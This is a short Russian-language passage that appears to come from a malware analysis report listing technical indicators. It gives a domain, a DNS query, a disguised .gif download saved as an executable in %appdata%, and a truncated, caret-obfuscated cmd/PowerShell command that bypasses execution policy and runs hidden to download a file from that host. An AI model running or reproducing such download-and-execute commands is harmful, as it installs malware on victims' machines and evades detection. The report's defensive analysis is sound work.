Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowERSH^ell.exe -EXeCU^T^Ion^p^oLic^y BYpa^Ss -^n^O^pRofi^Le^ -^w^InDo^WstYLE^ hiD^D^eN (NEW-ObjE^cT S^ysT^EM^.ne^t.wEBcLi^E^n^T)^.d^Ow^NLOADfILE(^'http://www.doorasope.top/r...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "PowERSH^ell.exe -EXeCU^T^Ion^p^oLic^y BYpa^Ss -^n^O^pRofi^Le^ -^w^InDo^WstYLE^ hiD^D^eN (NEW-ObjE^cT S^ysT^EM^.ne^t.wEBcLi^E^n^T)^.d^Ow^NLOADfILE(^'http://www.doorasope.top/r...' (со скрытым окном)